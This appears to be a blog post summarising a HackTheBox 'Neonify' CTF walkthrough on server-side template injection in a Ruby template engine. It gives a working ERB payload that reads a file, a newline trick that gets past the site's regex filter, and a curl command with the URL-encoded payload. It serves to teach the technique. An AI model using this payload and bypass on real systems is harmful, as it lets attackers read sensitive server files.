We covered Server Side Template Injection vulnerability and demonstrated a practical scenario using HackTheBox Neonify web challenge. SSTI is a server side exploit in which user input is parsed directly to the template engine without validation. In the example we covered, the code contained a regular expression filter to rule out bad characters so we used a newline character and encoded a payload using URL encoding to reveal the flag contents.. This was part of HackTheBox Neonify.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course

CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files
  • <%= File.open('flag.txt').read %
  • The payload should be URL-Encoded with a newline character.

An example request can be sent with curl using the below command to reveal the flag.

curl -d ‘neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E’ ip:port

Video Walkthrough

, , , ,
Show Comments

Motasem

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles